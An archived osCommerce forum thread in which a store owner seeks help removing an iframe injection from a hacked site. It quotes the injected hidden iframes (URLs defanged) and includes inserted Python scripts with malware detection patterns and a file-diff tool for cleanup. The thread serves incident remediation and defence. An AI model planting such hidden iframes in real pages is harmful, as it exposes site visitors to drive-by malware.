osCommerce

The e-commerce.

Iframe Trojan Present


fengshui37


My client was recently informed by AUScert that her website was hosting malicious content.....specifically iframes that pointed to links as follows (Here and below, I have masked and incorrectly formatted them so these are NOT the exact links):

>> hxxp://msn-analytics. net/count.php?o=2
>> hxxp://pinoc. org/count.php?o=2
>> hxxp://wsxhost. net/count.php?o=2

were being inserted into the html coding for many pages.

 

I believe we fixed the problem that allowed it to get in there in first place and with hours of work, removed all instances of the code and finally removed a couple of php scripts that had been installed on the server which we believe were allowing the unwanted access.

 

The only problem is that the iframe code is STILL present in source code for the catalog site (oscommerce). I downloaded EVERY single file associated with the catalog site and searched it for instances of "pinoc" and "wsxhost" and also decimal, hexadecimal, and binary ASCII representations of those letters and found no instances of it in the oscommerce files BUT it is still showing up in source code.

 

Has anyone else experienced this and if so, how or where or in what file or where in the MySQL database did you need to go to remove the code such that it was no longer present in the source code for the oscommerce site. For that matter the code is inserted in the very first line of the source, i.e.:

 

<iframe src="hxxp://msn-analytics. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="hxxp://pinoc. org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="hxxp://wsxhost. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="hxxp://msn-analytics. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html dir="LTR" lang="en">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">............

 

Thanks,

- Fengshui37


You probably won't find it searching for the actual text injected into the page.

 

They normally use obfuscated PHP code to do that.

 

Many hijackers use the PHP function base64_decode for that.

 

Search for the string base64 in the catalog files.

 

If you want you can post any suspicious looking results.

 

It's usually not too difficult to spot "malicious" code.

;)

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 


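Added here as an illustration of the advice above (this is not baddog's code nor anything shipped with osCommerce): a small Python scanner that greps a downloaded copy of the catalog for the obfuscation patterns named in this thread (base64_decode, eval and similar wrappers, zero-size hidden iframes, hex-to-character JavaScript) and, because the iframe lands before the doctype, also flags auto_prepend_file in .htaccess or php.ini, which would run a file before index.php produces any output. The sample tree, file names and contents are constructed for the example.

```python
import os
import re
import tempfile

# Signatures a defender greps for when the injected iframe shows in the rendered
# page but its literal text is in no file: PHP decode/eval wrappers, hidden
# iframes in templates, and .htaccess/php.ini directives that run a file before
# index.php emits anything (here the iframe lands before the doctype, i.e. before
# the first byte of normal output). Constructed, illustrative list, not exhaustive.
CODE_PATTERNS = {
    "base64_decode": re.compile(r"base64_decode\s*\(", re.I),
    "eval": re.compile(r"\beval\s*\(", re.I),
    "decode-wrapper": re.compile(r"\b(gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "hidden-iframe": re.compile(r"<iframe[^>]*(width=0|height=0|hidden)", re.I),
    "hex-string-js": re.compile(r"parseInt\([^)]*,\s*16\)", re.I),
}
CONFIG_PATTERNS = {
    "auto_prepend_file": re.compile(r"auto_prepend_file", re.I),
    "auto_append_file": re.compile(r"auto_append_file", re.I),
}
CONFIG_NAMES = {".htaccess", "php.ini"}
SCAN_EXT = {".php", ".inc", ".htm", ".html", ".js"}

def scan_file(path):
    """Return [(signature, line_number)] hits for one file; [] if clean."""
    patterns = CONFIG_PATTERNS if os.path.basename(path) in CONFIG_NAMES else CODE_PATTERNS
    hits = []
    with open(path, encoding="latin-1", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            hits.extend((label, lineno) for label, rx in patterns.items() if rx.search(line))
    return hits

def scan_tree(root):
    """Walk a catalog copy; return {relative_path: hits} for each file with hits.
    images/ is walked too: the backdoors in this thread were .php files dropped
    there, so filtering is by extension and file name, never by folder."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname not in CONFIG_NAMES and os.path.splitext(fname)[1].lower() not in SCAN_EXT:
                continue
            full = os.path.join(dirpath, fname)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return findings

def build_sample_catalog():
    """Constructed sample tree (not the poster's files) to exercise the scanner."""
    root = tempfile.mkdtemp(prefix="catalog_")
    sample = {
        "index.php": "<?php\nrequire('includes/application_top.php');\n?>\n<html></html>\n",
        "includes/application_top.php": "<?php\n$x = 1;\n",
        "includes/footer.php": '<iframe src="http://placeholder.invalid/c.php" width=0 height=0></iframe>\n',
        ".htaccess": "Options -Indexes\nphp_value auto_prepend_file /tmp/PLACEHOLDER.php\n",
        "images/logo.php": "<?php eval(base64_decode('ZWNobyAxOw==')); ?>\n",  # decodes to: echo 1;
        "images/logo.gif": "GIF89a\n",  # binary formats are not text-scanned here
    }
    for rel, body in sample.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="latin-1") as fh:
            fh.write(body)
    return root
```

Run scan_tree() on the directory you downloaded the catalog into; every hit is a line to read by hand, since legitimate code also uses some of these functions.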

Check the includes/languages/ folder also,

htaccess,

your images folders.

Which files do you see the iframe present in the source code?

Check your header.php + footer.php also.

 

I downloaded it all including the htaccess files and image folders etc onto my hard drive.....and essentially searched for "pinoc" which is definitely a string that is present in the source code for the "store" (first line before the <html> tag). Since the "webpage" is all script driven in oscommerce, I am actually seeing it when selecting the "view source code" option from either right click or browser drop down menu. I've been trying to find where it has been placed in one of the scripts that displays the store. I found every instance elsewhere on the server outside of the catalog folder (446 of them) and removed them and also fixed what I think was the original loophole that allowed the doggone thing to be "installed". So far that is holding but still can't find out where they installed it in the catalog or how they did it.

 

Also searched for string "base64". None found.


You probably won't find it searching for the actual text injected into the page.

 

They normally use obfuscated PHP code to do that.

 

Many hijackers use the PHP function base64_decode for that.

 

Search for the string base64 in the catalog files.

 

If you want you can post any suspicious looking results.

 

It's usually not too difficult to spot "malicious" code.

;)

 

I did the search for the string base64 and also threw in "iframe" and still no instances found. It's coming from somewhere because when I load the page and view source it's there but it's apparently NOT in any of the catalog files. Unless they've hidden it somehow in one of those core.#### files (I have no idea what their function is).

 

Any other ideas?

 

- Fengshui37

***********************************

...never bugs, my programs do however have occasional undisclosed random features...


I cannot look as my virus checker will not allow me to. Check your images folder for anything you do not recognise; also check your folder permissions, no higher than 755.

Nic

Source code contains:

 



What's the URL?

 

URL for the site I'm talking about is www.fengshuicuresandcrystals.com

 

- Fengshui37

 



URL for the site I'm talking about is www.fengshuicuresandcrystals.com

 

- Fengshui37

 


It gets inserted into the page source before this:

 

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

So what's in your /catalog/index.php before that code?

:unsure:



Hi, I just tried to go to the mentioned site and sure enough my avast detected it and said it was called - HTML:Iframe-gen which it says is a virus/worm. I was searching for a reason that I have been having trouble with my website database acting up. I sure hope I have not been infected with some sort of virus as well. I hope you can figure this out. Sorry that I don't know about such things.


It gets inserted into the page source before this:

 

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

So what's in your /catalog/index.php before that code?

:unsure:

 

Here is the code up to and slightly after that:

 

<?php
/*
  $Id: index.php,v 1.1 2003/06/11 17:37:59 hpdl Exp $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2003 osCommerce

  Released under the GNU General Public License
*/

  require('includes/application_top.php');

// the following cPath references come from application_top.php
  $category_depth = 'top';
  if (isset($cPath) && tep_not_null($cPath)) {
    $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
    $cateqories_products = tep_db_fetch_array($categories_products_query);
    if ($cateqories_products['total'] > 0) {
      $category_depth = 'products'; // display products
    } else {
      $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");
      $category_parent = tep_db_fetch_array($category_parent_query);
      if ($category_parent['total'] > 0) {
        $category_depth = 'nested'; // navigate through the categories
      } else {
        $category_depth = 'products'; // category has no products, but display the 'no products' message
      }
    }
  }

  require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);
?>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS; ?>>

*****************************************

If this is different from what people with "clean" sites have, let me know what is different because I am not seeing the offending code inserted here in this file.

 

- Fengshui37



Look in here:

 

require('includes/application_top.php');



Hi, I just tried to go to the mentioned site and sure enough my avast detected it and said it was called - HTML:Iframe-gen which it says is a virus/worm. I was searching for a reason that I have been having trouble with my website database acting up. I sure hope I have not been infected with some sort of virus as well. I hope you can figure this out. Sorry that I don't know about such things.

 

I'm betting that if your avast detected it, it also blocked it from causing any problems. I've got this thing 99 percent removed from the server for actually 3 different web sites....the only part I haven't figured out yet is the catalog i.e. where is it residing/hiding????



Another thought....

 

Since you're running your store in an iframe from some file in the root folder, the bugger could be in some file in the root folder and not in the catalog folder at all.



Look in here:

 

require('includes/application_top.php');

 

Nothing jumps out at me here either....so far as I can tell it's OK...but I've got a version from July I can run a comparison on I suppose. Too many files to do this on one by one with the (actually superior) text editor I'm using....


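The comparison against the July copy can be automated instead of done file by file; the Python script below is an added example, not code from this thread or from osCommerce. It hashes both trees and lists the files that are new, missing or changed, so only those need reading. The directory layouts and file contents are constructed for the example; in practice the two arguments are the unpacked July backup and the downloaded live catalog.

```python
import hashlib
import os
import tempfile

def hash_tree(root):
    """Map every file under root (relative, '/'-separated) to its SHA-256."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[os.path.relpath(full, root).replace(os.sep, "/")] = h.hexdigest()
    return digests

def compare_trees(clean_root, live_root):
    """Return (added, removed, modified): paths only in the live copy, only in
    the clean copy, or present in both with different contents. Each is sorted."""
    clean, live = hash_tree(clean_root), hash_tree(live_root)
    added = sorted(set(live) - set(clean))
    removed = sorted(set(clean) - set(live))
    modified = sorted(p for p in set(clean) & set(live) if clean[p] != live[p])
    return added, removed, modified

def build_sample_pair():
    """Constructed stand-ins for 'the July backup' and 'the downloaded live
    catalog' (not the poster's real files)."""
    clean, live = tempfile.mkdtemp(prefix="july_"), tempfile.mkdtemp(prefix="live_")
    base = {
        "index.php": "<?php require('includes/application_top.php'); ?>\n",
        "includes/application_top.php": "<?php\n// original include\n",
        "includes/languages/english.php": "<?php\ndefine('TITLE', 'Store');\n",
        "images/logo.gif": "GIF89a\n",
    }
    for root in (clean, live):
        for rel, body in base.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(body)
    # What a compromise typically leaves behind: one edited include (the edit
    # is a harmless constructed line here) and one new file under images/.
    with open(os.path.join(live, "includes", "application_top.php"), "a") as fh:
        fh.write("// constructed extra line\n")
    with open(os.path.join(live, "images", "extra.php"), "w") as fh:
        fh.write("<?php // constructed dropped-in file ?>\n")
    return clean, live

if __name__ == "__main__":
    added, removed, modified = compare_trees(*build_sample_pair())
    print("added:", added)
    print("removed:", removed)
    print("modified (read these first):", modified)
```

A file the server prepends from outside the catalog directory (for example through php.ini) never shows up in this diff, so the web server and PHP configuration need a separate check.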

^--- My last post ---^



Another thought....

 

Since you're running your store in an iframe from some file in the root folder, the bugger could be in some file in the root folder and not in the catalog folder at all.

 

Huh? The store isn't being run in an iframe. The catalog is set up as its own web page and separate from the other 3 sites that also have files in same server/public_html (root) folder. The catalog i.e. store is running oscommerce software as written and distributed and not using anything else from elsewhere on the server.


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Frameset//EN"
    "http://www.w3.org/TR/REC-html40/frameset.dtd">
<html>
<head>

<title>Feng Shui Cures & Crystals</title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="Our shop is the only dedicated Feng Shui Cures & Crystals Shop in Australia run by experts.">
<meta name="keywords" content="feng shui, fengshui, crystals, cures">

</head>

<frameset rows="0,*" border=0 frameborder=0 framespacing="0" marginheight=0 marginwidth=0 leftmargin="0" topmargin="0"> 
  <frame src="frame.htm" border=0 frameborder=0 framespacing="0" marginheight=0 marginwidth=0 leftmargin="0" topmargin="0">
  <frame src="http://www.fengshuinetwork.net/catalog" scrolling=yes>
</frameset>
<noframes><body bgcolor="#FFFFFF">

</body></noframes>

</html>

If I access the root folder, this is the source.



OK.

 

It's not an iframe.

:lol:



Source code contains:

 


 

Baddog, not sure what this was....is this the source code I'm looking to remove i.e. search for this in all the catalog files?

 

I've fixed/removed this thing from a lot (447) of files in other folders and so far it's staying clean after I found and removed a couple of php files that my Norton AV identified as containing Hacktool and PHPBackdoor respectively....and changed the permissions hopefully so they can't re-infect us. They were located in images and root folders on the server. The only place I can't find (or find out where they've hidden their code) is in the catalog (oscommerce) files.

 

Thanks to everyone for all your help so far....great ideas but so far I haven't been able to find the culprit that is lingering in the OSC site.

 

- fengshui37



Archived

This topic is now archived and is closed to further replies.
